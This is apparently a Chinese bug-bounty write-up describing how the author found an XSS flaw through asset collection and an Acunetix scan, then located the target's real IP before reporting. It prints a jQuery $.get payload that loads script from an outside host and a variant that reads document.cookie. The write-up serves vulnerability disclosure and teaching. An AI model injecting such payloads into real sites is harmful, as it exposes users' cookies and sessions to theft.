0x06 记录一次挖src的经历(xss漏洞)
漏洞平台:补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
个人总结的挖洞流程:
1)先用工具信息收集一波
我这里先用灯塔收集一下目标资产
2)然后用漏洞扫描工具扫描一波
我这里用Acunetix进行扫描
因为工具扫描需要点时间,所以我们也可以先进行手动渗透测试
漏洞扫描结果出来了,我们就可以查看一下情况
3)最后我这里发现了xss注入
我根据告警访问他引用的文章获取到了原始是payload:Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses · Issue #2432 · jquery/jquery · GitHub
$.get('http://sakurity.com/jqueryxss')
我这里改造一下,然后拿到目标的控制台中执行
$.get('https://example.com/fakeurl')
.done(function(data) {
alert('远程连接成功,数据:' + data);
})
.fail(function() {
alert(document.cookie);
});
4)最后如果你要提交漏洞的话你还需要收集目标域名的真实ip的地址
这里可以用在线的多地ping网站:网速测试,测网速,网站速度测试,卡卡测速网—卡卡网 www.webkaka.com
获取真实ip
有真实ip后就可以获取ip地址
iP地址查询--手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)
或者用站长工具查:IP/服务器120.77.143.220的信息 - 站长工具 (chinaz.com)